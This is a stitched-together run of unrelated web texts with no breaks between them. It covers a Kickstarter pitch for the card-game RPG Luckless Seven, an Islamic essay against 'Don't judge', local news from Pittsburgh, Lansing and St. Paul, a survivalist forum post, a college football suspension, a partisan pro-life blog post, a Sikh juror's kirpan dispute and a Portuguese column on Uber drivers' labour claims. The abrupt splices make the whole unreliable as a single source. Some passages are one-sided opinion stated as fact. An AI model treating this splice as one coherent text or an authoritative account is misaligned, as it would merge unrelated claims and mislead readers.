Luckless Seven is a card game RPG developed for PC/Mac/Linux and set in a near-future fantasy setting . The game will put players in the shoes of Mark , a young adult drifting through life . Recently fired from his dead end job , Mark decides to take a leap of faith and joins his friends on a cross-country Ekosi tour .
Ekosi is the name of the card game used as the battle system for Luckless Seven . The foundation for the card game was inspired by Pazaak , a minigame from Bioware 's 2003 hit Star Wars : Knights of the Old Republic . Both Ekosi and Pazaak are similar to Blackjack but have a few key differences such as players having a hand in which they can play cards to manipulate their score .
Besides battling other characters , players will visit a wide array of environments and engage in the personal storylines of each of his party members . Each of the characters that travels with Mark will have a prominent role in the story and fully developed character arcs . The player 's interactions with his party and those he interacts with will determine what dialogue choices they are able to make and how their story will develop .
Character progression will be expressed through increased dialogue options and more powerful Ekosi cards . Besides card battles , the player will also be able to interact with many NPCs and witness many story-creating events when they explore Arithia 's cities . By taking the time to interact with the world 's characters and participating in each party member 's story arcs , the player will level up their character and unlock additional story events , dialogue trees , and endings .
For more information about the game , visit the Luckless Seven websites .
The overarching narrative involves travelling from city to city and participating in Casino qualifiers ( similar to gym leader battles ) and progressing your way through a large national tournament . Outside of battling people however , Mark will have significant involvement with the people he travels with .
Each person in the party will have fully developed character arcs and make a significant impact on how the story progresses . Players will be able to develop Mark 's personality and worldview through dialogue choices and actions . Certain decisions will open up new dialogue choices while preventing others from being chosen .
Future builds will incorporate more expansive outdoor environments and deep questlines for your party members . Player interaction with their party members will be deep - each party member will offer a variety of different optional storylines that the player can choose to pursue .
We would also like to have a greater variety of portraits to convey character emotions . Right now , some of the main characters have over a dozen portraits to depict different emotions . We would like to have a wide range portraits for more of the characters .
Our Arcade Mode allows players to quickly jump into different game types . Random draft puts players into a game with a random set of cards . Balanced draft puts them in with a select number of cards from each card category . In the near future , we will be adding Constructed which will allow players to completely customize their decks ( the game mode that is used in the campaign ) . Additional modes will be revealed later on !
Physical Cards :
Foil Card Front . Kickstarter Backer Reward .
Foil Card Back . Kickstarter Backer Reward .
Deck of Ekosi Cards ( 72 ) . Kickstarter Backer Reward .
Deck of Ekosi Cards ( 72 ) . Kickstarter Backer Reward .
With Luckless Seven , we hope to take character development and progression in another direction . The game will have two primary leveling systems : collecting more powerful cards that boost your capabilities in battle and increasing your social development by interacting with other characters in the game .
In order to create all the art and sound assets we require to make the game we 're envisioning , we need Kickstarter 's help . Funds from Kickstarter will be used to create more character portraits , animations , and music tracks . Please join us on our journey as we attempt to create a rich and fulfilling role playing experience !
There 's been a trend in recent years in the American Muslim community of people invoking “ Do n't judge ” when they see fellow Muslims questioning certain speech and behaviors as being outside the Islamic bounds . In my anecdotal observations , the major swath of those primarily invoking this phrase come from the “ Unmosqued , ” meaning those who have a connection to Islam without necessarily having an attachment to institutions based upon inadequacies within their structures and/or behaviors of their members . While there is a tendency among too many Muslims to expect a monolithic understanding or practice of Islam , “ Do n't judge ” has also been used as a phrase to minimize certain matters that have been Divinely legislated in which there have always been consensus and as a means of paradoxically painting those who do not agree with their whims as being intolerant .
People are judges , but not the Ultimate Judge
“ We judge with the outward while Allah is connected to non-apparent matters ” – Prophet Muhammad ( prayers & peace be upon him and his family ) .
We are not supposed to make judgments to assess persons ' human value , their intentions and their after-lives . Allah ( Mighty & Sublime ) gave all humans intrinsic dignity upon their creation ; thus , none should dehumanize others . He ( Mighty & Sublime ) is also the All-Knowing who fully knows matters of the hearts , which are secrets between His servants and Him in which ( wo ) men can not totally ascertain . People also do n't know the status of others ' after-lives , for they ca n't even be 100 % sure of their own status once being lowered into their own graves .
We , however , are to make individual judgments as a natural function of intellect in order to advance , in a healthy manner , our own individual selves , families , groups and society as a whole . Likewise , we are to make judgments in order to keep ourselves safe from personal injury and that which causes harm to the common good . All societies have judges to enforce the law when people step outside of the boundaries of what has been legislated by governments compromised of ( wo ) men . These judges have criterion in which there are parameters that differentiate right from wrong .
Al-Qur'an , Prophetic Statements and Absolute Consensus of Early Muslim are Criterion
And whoever does not judge by what Allah has revealed , they are from the ingrates – [ Al-Qur'an 5:44 ]
And whoever does not judge by what Allah has revealed , they are from the wrongdoers – [ Al-Qur'an 5:45 ]
And whoever does not judge by what Allah has revealed , they are from the transgressors – [ Al-Qur'an 5:47 ]
The three ayaat stated above directly refer to the People of the Book but are also warnings for Muslims . Those who decided to act upon their own whims while ignoring or covering up what Allah ( Mighty & Sublime ) revealed are referred to as “ Al-Kaafireen , ” “ Al-Thaalimeen ” and “ Al-Faasiqeen. ” The word “ Al-Kaafireen ” or ingrates means those who covered the Divine truth given to them ; therefore , they showed a lack of gratitude for that which was revealed to guide them towards success . “ Al-Thaalimeen ” or wrong-doers means those who have committed wrong because they took matters out of their proper places in which they were ordained to be . All three of these groups mentioned were those who professed belief in One Deity and had “ religious ” affiliations yet were spoken of in these terms . In these are signs that we can go astray from the path by not judging matters by what was Divinely revealed .
It is not befitting for a believing man or believing woman that when Allah and His messenger decree a matter that they have an opinion about it , and whoever disobeys Allah and His messenger have clearly gone into manifest error – [ Al-Qur'an 33:36 ]
Oh you who believe ! Obey Allah , obey the messenger and those in authority among you . And if you disagree over anything , refer it back to Allah and the messenger if you believe in Allah and the Last Day . That is better and is the most excellent interpretation –
[ Al-Qur'an 4:59 ]
Though there is much room for interpretation on some issues , there are specific matters that are not subject to reinterpretation of permissibility , which have been made clearly unlawful in Al-Qur'an , by the Prophet ( prayers & peace be upon him and his family ) and agreed upon by his pious family and descendants and righteous companions . Those who believe in Al-Qur'and are obligated to obey the Prophet ( prayers & peace be upon him and his family ) on that which can be authenticated through sound transmission , which does not contradict Al-Qur'an . Similarly , the absolute consensus of the early community of how specific matters were understood that agree with these two are confirmation . It is only natural that the Muslims who recognize these authorities will base what is correct and incorrect within these parameters .
The Folly of Moral Relativism in Post-Modernity
“ Do n't judge ” is influenced by the post-modernist trend of moral relativism , meaning that individuals can claim that everyone has the right to individual “ truths ” and that these constitute a singular truth . In other words , everyone can have independent “ truths ” and to negate others ' “ truths ” is being dogmatic and judgmental . Hence , for those who state that anything that clouds judgment for non-medicinal purposes such as marijuana is forbidden according to Islam and should not be legalized , these are considered closed minded people . For those who say that they are not in favor of same-sex marriage because Qawm Lut received the greatest punishment including the wife of Lut ( AS ) , who was a monotheist that did not take issue with that sexual behavior and lifestyle , these people are incorrectly labeled as homophobes . Thus , those who uphold the sacred , which does not jibe with particular worldviews based upon obtuse individualism 's right to define what “ truths ” should be accepted are deemed as being judgmental and intolerant people . This postulation is complete nonsense , for even those who put forth such claims make judgments about those who do n't accept their worldviews .
One of the greatest challenges to American Muslims is the erosion of particular values due to many of us compromising Islamic mandates and seeking to be accepted by the status quo and/or coming under the influence of secular post-modernism . Enjoining right and forbidding evil is a non-negotiable part of the Islamic faith , which is an individual obligation ( fard ‘ ayn ) as well as a community obligation ( fard kifaayah ) . We are not to desist from our morals and ethics due to changing public opinion polls and the rise of intellectual currents that seek to eliminate the sacred from the public socio-political discourse . We are to present an intellectual discourse based upon our text absent of hostility and harshness . This should be non-negotiable for all of us .
TechShop Pittsburgh will stay open an extra 60 days — until Nov. 30 , TechShop corporate announced Friday .
This is the second extension for the Larimer maker space to stay open since its closing was first announced in May . The space was originally slated to close Sept. 1 , but members got an extension to the end of the month . Now , they have two more months .
The added time gives newly created Protohaven , a nonprofit formed to replace the shop , more time to fundraise and plan for a smooth transition from one organization to the other and to a new space , said Devin Montgomery , a founder of Protohaven .
“ There 's been a lot of anxiety about the shop closing , ” Montgomery said , given the strong sense of community and businesses based at the shop . He added that there 's been “ overwhelming support ” for a version of the shop staying open .
Dan Woods , CEO of TechShop , emailed members Thursday ( The Incline obtained a copy of the message ) , saying that the company and Walnut Capital , which owns the shop 's Bakery Square location , were able to come to an agreement to extend the lease . The plan is to transfer the TechShop Pittsburgh license to Protohaven at the end of November , he wrote .
“ This lease extension will buy some much-needed time to finalize planning and arrange funding to continue operation of TechShop Pittsburgh as a licensee , ” Woods wrote .
Per a news release , Protohaven as a licensee of TechShop means that Protohaven will honor TechShop memberships .
Woods wrote in his Thursday email that Protohaven as well as TechShop staff and members “ have been working incredibly hard to make plans for this next iteration of Pittsburgh 's largest open-access maker community . We want to support these efforts in every way possible . ”
Since the closing was announced , members have met weekly trying to find a way to keep the space open . Last month , Gadsden Merrill , TechShop Pittsburgh general manager , and Montgomery , a TechShop member , filed the state paperwork to create Protohaven and plans were to relocate at the end of the month due to rent costs .
Protohaven will still relocate , but now there is added time to find a space and more options for when it comes to moving , such as moving in phases , Montgomery said .
“ We 're looking at a few locations , ” Montgomery added . ( One possible location is 7800 Susquehanna St. in Homewood . )
TechShop 's closing was part of a business model switch for the corporation as a whole . The company previously relied on memberships and educational programs as main sources of revenue and shifted to a “ new partner licensing model. ” As part of that , the Pittsburgh shop was slated to close because it was n't meeting operating expenses .
A Mean Green Bean said ...
FerFal ,
This topic is timely as we are having a discussion on the Life After the Oil Crash Forum about starting micro businesses based on the top items needed after a crash . Can you give us an idea of what items / services people want the most post crash . Here 's a link to the discussion . http : //www.doomers.us/forum2/index.php/topic,40122.0.html .
Thanks in advance !
Of course you have the basics : food , water , shelter and medicine . ( Renting real estate will become a good business , by the way )
Problem with the food market is , it 's as old as mankind itself , you can hardly compete with the big firms .
The smaller producer will find himself out of his league unless he has a couple hundred acres .
It 's better to try to exploit the “ small mom and pop ” thing , find the marketing niche , organic food .
But this is very tricky . I mean most people I know that grow food small scale know well enough It 's for them and not profitable as a business idea .
This is a common mistake among the survivalist community if you ask me . What I started calling the “ Little house on the Prairie “ syndrome .
Guys , the only way you 'll go back to 1800 is if you build a time machine .
Serious . Barrel maker , carriage builder , carriage wheel repairer , making horse shoes for a living… making a fortune selling candles . Even trapper was suggested somewhere .
What can I tell you ? I do n't see that here . I 've researched and talked to others on eastern Europe and Africa and nope , not the kind of thing that will get you serious money .
Some of the lists going around the various forums are simply lists of skills used a couple hundred years ago , very wild west like . But again , it 's wishful thinking , and not something I see reflected here or in other places where SHTF .
Even gun smithing . Gunsmithing is something that will certainly go DOWN , not up .
People will have guns for defense but spend as little money as possible . No more tacticool 2000 USD 1911 for many . Those are “ nice to have ” , and “ nice to have ” doens't cut it for SHTF market . They wont spend what little money they have on something like that , at least MOST people wont .
This is the kind of subject that could go on forever . Serious , the dynamics of the post SHTF market could fill libraries .
My friend in the USA asked for a bit of advice regarding business ideas the other day .
He told me a bit about what he had in mind , and at some point he said he had a buddy that offered him a percentage on a car sound system installation shop , also doing tainted glasses and car alarm .
He said that he did n't think people would want to spend money on an fancy sound system during the depression .
We talked about how car alarms and security film for windows would go up in demand . Also tainted for security reasons .
When we got to the sound system part , he asked what I thought about that .
I told him “ well… there 's a few things people want when SHTF : “ Booze , religion , drugs , prostitutes and gambling .. and a loud car ”
I told him that its common here to see total rust buckets from the 70 's with maybe 1000 bucks worth of sound system . Maybe more expensive than the car itself .
Of course any business can fail , but if his friend does things right and is a smart businessman , he has a fair success chance .
My friend say “ Man , peoples are stupid ”
I told him “ YES , dude , they are ”
But why , why would a poor guy spend his hard earned money , the little he has , on something like that ?
Because that 's the way people are ! Maybe the guy has n't got a week worth of food and water OR cash , but he 's gladly going to spend it on drugs , or a fancy sound system , simply because it makes him feel less miserable .
That 's valuable folks , ESPECIALLY when SHTF and getting depressed and feeling miserable is so easy .
It 's what I like to call “ affordable luxuries ” .
I see it here all the time , and you see it in other poor nations .
They ca n't afford the fancy car anymore , but they can afford the expensive tires or sound system .
A loud sound system can be turned up the volume .. wake up everyone… everyone sees you have the fancy gadget … ego boost for our poor guy . See the mentality I 'm talking about ?
Something similar happens with cell phones . Selling cell phones is a pretty nice gig during depression . It 's an “ affordable luxury ” .
I do n't have a home of my own , or a car , “ but take a look at my nice ( toy ) phone ” . The guy/girl already feels better about himself .
The same happens for jewelry . Most women ca n't afford the gold anymore , and it 's too dangerous even if they can . But there 's still silver , and “ quirurgic steel ” jewelry is becoming more and more popular .
Affordable , looks good , shiny , wont get stolen in 10 minutes . Research the market and promote it well and you have a winning combination .
Forget the old days , at least as business ideas . Recognize the new needs and the new society you are dealing with and what they want/need .
There 's how you start a real post SHTF business .
FerFAL
Title/Alt Text Per a source , Irish247.com has learned that Notre Dame junior running back Greg Bryant will miss the first four games of the 2015 season .
The 5-10 , 205-pounder will miss part of the upcoming season because of a `` violation of team rules . ''
Bryant , who played in 12 games last season rushing for 289 yards and three touchdown , will be sidelined for games against Texas [ Sept. 5 ] , Virginia [ Sept. 12 ] , Georgia Tech [ Sept. 19 ] and UMass [ Sept. 26 ] . He will return for the Oct. 3 road matchup with Clemson .
After a stellar high school career , Bryant signed with Notre Dame in the 2013 class . He was a second-team USA Today All-USA high school All-American and a U.S. Army All-American . He rushed for 1,447 yards and 17 touchdowns on 186 attempts as a senior for Delray Beach ( Fla. ) American Heritage high school .
Buy Photo Lansing mayor Virg Bernero talks to the Lansing State Journal on Monday , Feb. 27 , 2017 at his office in Lansing . Bernero announced he would not run for a fourth term . ( Photo : Julia Nagy/Lansing State Journal ) Buy Photo
LANSING - Mayor Virg Bernero surprised the city Monday by annoucing he will not seek a fourth term .
The decision , first announced on Bernero 's Facebook page , came less than a week after state Rep. Andy Schor , D-Lansing , announced his own candidacy for mayor and with At-Large Council Member Judi Brown Clarke also weighing a run — setting up potentially the most competitive field Bernero would have faced since being elected in 2005 .
During an interview Monday afternoon in Bernero 's office , the mayor told the Lansing State Journal he does n't know what his future plans are .
`` Beats me , '' Bernero said . `` I 'm thinking about the next 10 months . I 'm going to finish strong . It 's going to be a great year . '' He did say he plans to remain in Lansing after leaving office .
On Feb. 17 , Bernero had released a statement that was critical of Schor and indicated he was `` ready to reapply for my job '' and had plans to `` run on my record . ''
Related :
In his Facebook statement , Bernero said `` I must put my family first now '' and cited his 25 years of public service , which includes time on the Ingham County Board of Commissioners and in the Michigan Legislature .
`` With my 91-year-old father , Giulio , living with us , I simply can not do justice to the city and my family , while running a 7-month campaign , though I still have a lot of competitive spirit in me , '' Bernero wrote .
Bernero also stressed family in the LSJ interview , with his wife Teri and two daughters present . `` If I were a bachelor I would probably run again . But if I ran again I would probably be a bachelor , '' he quipped .
Bernero 's decision shocked some while also prompting statements of praise for his accomplishments .
Schor first reacted via email : `` I thank him for his leadership navigating this city through tough times and wish him and his family all the best as he transitions to the next phase of his career and life . ''
In a follow-up interview , Schor said Bernero 's departure would n't affect his own campaign . `` I 'm running on my vision and my record , '' he said . `` My path stays the same . ''
Clarke told the LSJ she plans to announce her decision on a mayoral run within days . About Bernero , she said : `` I thank the mayor for his last 12 years of leadership and appreciate his passion for the city . ''
Among the accomplishments Bernero cited in his statement are leveraging `` more than $ 2.3 billion in new economic development that has retained and created more than 12,000 jobs '' and the fact that Lansing has become `` the second city in the nation to remove all of the lead water pipes in the city . ''
But there also were difficult moments . In early 2016 , he was at the focal point of controversy over the departure of then City Attorney Janene McIntyre , who left with a $ 160,000 settlement agreement that included nondisparagement clauses and financial penalties for violating them . The controversy lingered for weeks as frustrated City Council members and citizens demanded answers .
Bernero self-styled as the `` angriest mayor in America '' during the Great Recession , appearing as a frequent guest on cable news to discuss problems facing America 's manufacturing cities and to advocate for the auto industry bailout that ultimately won federal support .
`` He was with us during tough times , ” recalled Mike Green , president of UAW Local 652 , which represents workers at General Motors ' Lansing Grand River Assembly plant . “ He was n't afraid to speak out . ”
In Lansing , Bernero 's `` angry mayor '' persona sometimes ruffled feathers on the City Council . There also were worries that the mayor 's abrasive style was hindering the growth of regional cooperation that some civic and business leaders believe is essential for the region to thrive .
Like others , Green noted that the union did n't always see eye-to-eye with Bernero . “ We often agreed with the mayor and we often disagreed with the mayor , he said . `` For the most part he did a good job . I appreciate his service to the city . ”
Buy Photo Mayor Virg Bernero said Monday he wo n't seek a fourth term . He cited a desire to spend more time with his family . From left to right , his wife Teri , and daughters Virginia and Kelly . ( Photo : Julia Nagy / Lansing State Journal )
Former Mayor David Hollister said in an interview that he did n't see Bernero 's announcement coming . During a conversation with Hollister a few weeks ago , Bernero mentioned a campaign fundraiser coming up and the mayor 's scheduled State of the City Address next month .
`` I know the job does take a toll physically , emotionally and with family time , '' Hollister said . `` I was n't shocked when I heard , but I was a bit surprised . I know his personality and how he tends to be all in with whatever he does . ''
As of 5 p.m. Monday , Bernero 's campaign website votevirg.com was still able to receive donations . Bernero told the LSJ that all campaign money he has raised is expected to go to charity .
`` I 'm kind of speechless , '' about the decision , said Lansing police Detective Brad St. Aubin , head of the police union 's non-supervisory division . `` We 've had our ups and downs during his tenure , and yet we 've always tried to do what was right for the citizens . ''
Eric Weber , head of the city 's firefighters union , said he was impressed with Bernero 's leadership as the city mourned the death of firefighter Dennis Rodeman in 2015 , and that the mayor could always have frank conversations .
`` He 's been a good leader for the City of Lansing and a friend to firefighters , '' Weber said .
Developer Joel Ferguson , vice chairman of the Michigan State University board , said the city should not expect Bernero to be a lame-duck mayor or to leave the spotlight altogether . Ferguson is part of an investment group proposing the Red Cedar Renaissance , a $ 380 million project that may need financial incentives from the city to come together .
`` He 'll stay as mayor until the day his term ends , '' Ferguson said . `` He 's an original . He 's very candid , and he 's a very honest person , and he 's combative . No middle ground with him ... He believes in Lansing , and he will still be a very active person . ''
Bernero himself suggested as much , saying in his statement `` I will spend the next 10 months continuing to build our city up , rather than tear an opponent down . I will put the finishing touches on some key developments and begin some transformational projects before the end of my tenure . ''
Tim Daman , president of the Lansing Regional Chamber of Commerce , praised Bernero for progress made during his 12 years at the helm .
`` We appreciate the Mayor 's energy , passion and dedication to make Lansing a stronger business community and our city a better place to live , work and thrive . We wish Mayor Bernero and his family all the best . ''
Read or Share this story : http : //on.lsj.com/2mwvluO
A raucous crowd of roughly 200 brought a megaphone and chants to a Monday night district council meeting on St. Paul 's East Side , screaming so loudly it took 20 minutes for a single vote .
This month , the Dayton 's Bluff Community Council laid off all its staff . Businesses are demanding money . And former staffers are pointing to one person : the executive director who more than tripled the council 's budget during her tenure .
Although located in one of the city 's poorest neighborhoods , the Dayton 's Bluff council is one of the most ambitious district councils in the city , owning or co-owning three nonprofit enterprises and serving as a fiscal agent for a half-dozen others .
The very building they were voting in was on the line — with a final balloon payment due for its $ 1.2 million purchase and renovation : a job and business Enterprise Center that 's already received hundreds of thousands of dollars in city and state funding .
At the climax of their Monday evening meeting , the board voted 6-5 to keep executive director Deanna Abbott-Foster on an unpaid , volunteer basis while they struggle to figure out finances even Abbott-Foster admits are in serious flux .
RELATED : St. Paul 's district councils — what 's the city 's role ?
“ You 've allowed someone to bury the bodies if there were any , ” yelled neighborhood resident Laura Mayo before the vote .
“ What we have is a shortage of money , and it 's a temporary thing . It 's a cash floor , ” Abbott-Foster said in an interview before the meeting , noting she was stepping down in the spring anyway . “ God knows , I 've made mistakes here . That should n't mean that all my work goes down the toilet , and the enterprise center ( building ) goes back to the owner and everything gets stopped . ”
Board president Jeanelle Foster , in office for weeks , said before the meeting , “ Right now we are trying to be smart and get all the answers . There are a lot of rumors flying around . … Honestly , we have just kind of been trying to catch up to what 's going on . ”
“ I do n't have a hidden agenda . I 'm the one losing out , ” said Mary Anne Quiroz , the most vocal of the council 's four former staffers . “ I just want what 's best for our community . Transparency and accountability .
“ Honestly , I do n't know how it snowballed to this point . ”
PROBLEMS ARISE
The saga started on Nov. 20 , when the council 's staff made a unique appearance before the board . They had n't been paid in weeks . And there was $ 308 in the council 's Sunrise Bank checking account .
Some also complained that Abbott-Foster was abrasive , even harassing . Abbott-Foster was not present at the meeting ; she had been warned by an anonymous text , she said .
The board suspended her for two weeks and hired a consultant to look into the staff 's harassment claims . They picked Brenda Beukelman , a former human resources director at HealthEast who was referred by an aide in city council member Jane Prince 's office .
Prince did not return a call for comment about the council , which is in her district .
While Beukelman was investigating , the board 's president and treasurer resigned . Financials were sent to an auditor in Bloomington , to see what a full audit might cost .
“ We have not gone with that guy ; that 's a question for the board . We are waiting for his response ( for a price quote ) , ” Jeanelle Foster said Monday .
Even then , “ the board has to decide , do we have the money for that expense ? ”
On Dec. 1 , the board 's executive committee got Beukelman 's report . That day , the council got an email from one of the groups whose money it managed . The group wanted that money back .
“ We are requesting to terminate our relationship with Dayton 's Bluff District Council as our fiscal agent effective immediately , ” wrote Hmong Americans for Justice , requesting a balance of $ 24,243 , adding they were “ appalled and disappointed ” by the council 's $ 308 bank balance .
Three days later , the council dismissed every staff member , saying that given the council 's finances , they had no choice . The next week , the council 's building cleaner sent a letter saying she was owed $ 198 . And the landlord for the council 's community radio station and cultural center also sent a letter . The council owed $ 3,160 in rent .
No one has made criminal allegations , and the council points out that it has undergone two partial audits this year , a requirement for governmental funding .
“ The cleaning lady will pick up a check today . The other staff will be paid , ” Jeanelle Foster said Monday afternoon .
That same week , the board 's short-term vice present , Crystal Norcross — who facilitated staff coming before the board — resigned with a public letter on her Facebook page , saying , “ I do not want to be responsible for any financial wrongdoing or Deanna 's ‘ moving money ' practices , therefore , I am removing myself as Vice President . ”
REPORT ISSUED
The Pioneer Press received a copy of Beukelman 's confidential report , which called Abbott-Foster a “ entrepreneurial and visionary thinker ” but criticized her management skills , saying she did not give enough direction to staff .
The report found “ miscommunication , strained relationships and high emotions , ” but no harassment .
“ There is no law that says a supervisor must be kind and nurturing , ” the report said .
As for finances , “ I do not believe this is a case of embezzlement or activity done for personal gain , ” Beukelman stated . “ Deanna admits to moving money around to cover expenses . Risk taking , delays in grant moneys , and the lack of anticipated fundraising results … contributed to the current cash flow issue . ”
But the report was based solely on staff interviews . Beukelman acknowledged that she did n't have access to any of the council 's financial data .
“ I was only there to look for harassment , ” she said in an interview , adding . “ But when I was doing the interviews , people always ended up talking about the budget . So that 's why I put it in the report . ”
‘ BIG RED NEGATIVE NUMBER '
Melinna Sixtos , who worked as the council 's head administrative assistant and bookkeeper since April , talked about a troublesome number in the council 's financials .
“ My biggest red flag was when I first started working there , I saw this big red negative number in red , ” Sixtos told the Pioneer Press . “ The previous person managing books always said she did n't know anything about it . … They kept saying it was an error . ”
Over the year , she watched that number grow from - $ 68,000 to - $ 178,000 when she left .
In an interview , Abbott-Foster acknowledged that the council 's 2017 proposed budget was about $ 470,000 — and they 'll likely only pull in $ 300,000 .
“ It was probably a crazy budget proposal . But every year we 'd gone up . That was on trajectory , ” she added , noting the 2016 actual budget was in the $ 400,000 range .
She said her own salary was $ 83,000 .
“ When I started we were on a $ 70,000 budget . And each year I was there , we increased the budget by $ 70,000 , ” she said .
She blamed the shortfall on several factors : two regular funders , including the St. Paul Foundation , pulled out this year . Their radio station did n't get any significant underwriting .
The Cultural Arts Center , which houses Quiroz 's private organization , Indigenous Roots , was n't on the budget — and cost the council roughly $ 40,000 in rent , utilities , $ 2,500 to artists , $ 1,950 for a video of its opening , and another $ 2,000 for performances at a 7th Street Live event that never happened , according to Abbott-Foster 's numbers .
Quiroz — who also works as the council 's cultural director , and handled payments for the cultural center — said the council only paid rent and utilities , which they were contracted to do until the center was self-sufficient , sometime next year .
And in September , the council hired a fundraiser , Lupe Castille , to help secure their economic center project . It cost $ 20,000 and no funds came in , Abbott-Foster said .
In an interview , Castille said she was hired as economic enterprise director for $ 79,000 with no benefits , to get money for the economic center .
“ In three to four weeks , I realized there were discrepancies in the budget . I started to ask for internal financials , in order to get forecasting , ” she said . “ Funders wanted deeper fiscal oversight , because in the past they had pulled away from funding because of lack of reporting , and timely follow-ups . ”
She said she did n't think it was her job to fill a general budget hole . “ For me that was n't ethically sound or fiscally responsible . ”
Abbott-Foster said fundraisers were hesitant because they knew she was retiring , and nobody wanted to give to a “ lame duck . ”
UNCERTAIN FUTURE
In addition to the Hmong justice organization , the council also serves as a fiscal agent — meaning it handles finances — for several park and garden clubs , including Skidmore Gardens , Senior Garden , and Stewards of Margaret Park . The council also owns a 100-watt radio station , East Side Radio .
And along with the Latino Economic Development Center , they co-own the building where the enterprise center is located — a workforce development investment that has attracted $ 250,000 in city STAR grants and loans , and $ 500,000 in funding from the state Department of Employment and Economic Development . The state Legislature just approved another $ 300,000 for programs there .
That center is now in flux , Abbott-Foster and board members say .
“ He ( former building owner Cleo Kelly ) wanted his money in April , ” Abbott-Foster said . “ The only reason he is waiting is he trusts me . ”
Kelly could not be reached for comment late Monday evening .
In a written response to vice president Norcross ' public resignation letter , the council noted it had shared the Beukelman investigation with officials at Sunrise Bank , which is considering a loan to make the balloon payment .
The reason : “ Five concerned citizens alleged financial mismanagement in their communications with the bank , and the bank insisted on reviewing the report as part of the loan refinancing approval process , ” the council 's executive committee wrote .
When council board treasurer Holly Windingstad pleaded during Monday 's meeting that the council might lose the building they were sitting in , she was shouted down by the crowd .
“ The community will still be here ! We got plenty of buildings ! ” one yelled .
READ THE REPORT
We know that Pres . Obama is the most fervently pro-abortion president in history . He even supported infanticide when he was in the Illinois legislature . We know that the leadership of the Democrat Party , and indeed the party as a whole , is virulently pro-abortion , even pro-abortion catholics such as Rep. Nancy Pelosi , VP Biden , and former Sec . Hilary Clinton .
It is no surprise at all that , when they consult with “ experts ” , they will choose those who hold their views also on abortion . They will echo the goals of the organizations such as Planned Parenthood , with which they are so closely entangled . They are tied to the motives and objectives of big business abortion .
I saw this story at Breitbart by Austin Ruse which all of you should know about concerning the MIT Prof Jonathan Gruber – the one who made the claim that they depended on the stupidity of the people to get Obamacare through – who was in part the architect of ObamaCare ( aka ObamaTax aka “ Affordable ” ) .
My emphases and comments :
OBAMACARE ARCHITECT JONATHAN GRUBER : ABORTION OF ‘ MARGINAL CHILDREN ' A ‘ SOCIAL GOOD ' Embattled MIT professor Jonathan Gruber has not only gotten in trouble for bragging about helping President Obama put one over on the American people with Obamacare , he 's also been uncovered as an abortion advocate—but not a run-of-the-mill advocate of “ women 's rights. ” [ A huge liberal victory , and an evil one at that , was successfully to make abortion into a “ women 's rights ” issue . It is not . It is a human right . ] No , Gruber 's abortion advocacy is of a particularly pungent eugenics variety . He 's on record repeatedly making the case from social science that abortion is a “ social good ” because it reduces the number of “ marginal children , ” by which he means urban poor—those he says can be counted on to commit crimes if they were ever born . [ So , let 's target the demographic that , statistically , are most likely to commit crimes . Right ? ] Gruber co-authored a paper during the Clinton years which argued that legal abortion had saved the U.S. taxpayer upwards of $ 14 billion in welfare benefits and that it also lowered crime . Gruber 's work heavily influenced other researchers , including a paper called The Impact of Legalized Abortion by Steven Levitt of the University of Chicago , whose later book Freakonomics and whose ongoing work makes the strongest case that abortion legalizations in the 1970s caused a dramatic drop in crime twenty years later . Pro-lifers have always wondered why the black community has not responded more aggressively to the fact that so many abortion clinics are located in poor neighborhoods and why the black abortion rate is so much higher than whites . A documentary called Maafa 21 argues that abortion is a part of what they called a “ black genocide. ” African-American marketing expert Ryan Scott Bomberger founded an organization called The Radiance Foundation that makes commercials for the unborn child with a special emphasis on the high incidence of black abortion . Emmy-wining Bomberger 's toomanyaborted.com campaign looks specifically at black abortion . One meme calls abortion a “ civil wrong ” and that blacks are “ still not free at last ” because of abortion . Bomberger is being sued by the NAACP for calling the group “ pro-abortion. ” A group called 41 Percent tracks all abortions in New York City , which has an abortion rate at twice the national average , [ how horrible ] points out that the abortion rate in the largely black borough of The Bronx is an astounding 47 % . These are the types of communities Gruber meant when he referred the “ marginal children ” who were the most likely to end up on welfare and committing crimes if they were allowed to be born .
Architect of ObamaTax . Architect of … black genocide ?
YUBA CITY ( CBS13 ) — A Sikh man wants to serve on a Sutter County jury , but the court will not let him because of the ceremonial weapon he carries .
Next week , Gursant Singh is scheduled for jury duty . He says he 'll be arriving with other members of his community , asking for the chance to serve on a jury .
“ I feel very strongly that as a citizen of the United States that I should be able to serve as a juror , ” he said .
Despite the fact he 's ready , he may never be allowed in the courthouse .
“ They 've put me in a position , ” he said . “ Either I violate my code of conduct with my religion , or I break the law . ”
Singh , who is Sikh carries a dagger , known as a kirpan , an important part of the religion he says that must not be removed .
“ It 's a very important article of our faith , put it that way , ” he said . “ We have five articles of faith in fact , and this is one of them . ”
But he 's been told his jury duty scheduled for next week will require him to show up without the kirpan . State law prohibits weapons of any kind in courthouses . ”
CBS13 spoke to Sutter County Jury Commissioner Mary Beth Todd , who is trying to come up with alternatives for Singh .
“ It 's important that we provide a safe environment for people 's issues to be heard , ” she said .
One idea is what some Sikhs have done in other counties , including storing the kirpan with security .
“ It 's extremely important that we be sensitive to this , and we 're trying to be sensitive to it , and we 're trying to find a solution that will work for both sides , ” she said .
But that solution does n't work for Singh , who has taken to YouTube to bolster support . he says he would rather be arrested than undermine his beliefs .
“ I 'm willing to do that , if that 's what it takes , in order to bring this issue out , ” he said .
CBS13 spoke to the Sikh Coalition , who tells us many other agencies have made exceptions for Sikh people to carry their kirpan , and they would expect the same from the court .
Ricardo Bordin *
O jornal Extra informou ontem , em sua versão digital , que “ Motoristas do Uber ameaçam ir à Justiça por direitos trabalhistas ” , a exemplo do que já ocorre nos Estados Unidos , sob a alegação de que esta prestação de serviço configura relação de emprego – e daí adviriam diversas obrigações patronais , como concessão de férias , pagamento de 13º salário , e tudo o mais previsto em nossa legislação . A discussão jurídica ainda vai render bastante , mas o ponto central da celeuma , a meu ver , deveria ser outro : quais seriam as consequências práticas de condenar o UBER a registrar todos os motoristas cadastrados como empregados ? E a quem elas beneficiariam de fato ?
Comecemos por analisar a viabilidade da petição em questão : seria possível considerar , à luz do ordenamento jurídico pátrio e da jurisprudência dominante , que estariam presentes os pressupostos que caracterizam a relação de emprego – positivados em nosso Direito nos artigos 2º e 3º da CLT ? Acredito que sim , muito embora dificilmente tal entendimento venha a ser unânime entre juristas . Conceber a adesão dos empregados ao regulamento estabelecido pela empresa como Subordinação , ou o fato de que não pode o motorista se fazer substituir por outro trabalhador no desempenho da atividade como Pessoalidade , são linhas de interpretação que provavelmente serão adotadas pelos magistrados a quem venham a se distribuídos os referidos pleitos – e que irão , por conseguinte , favorecer aos litigantes .
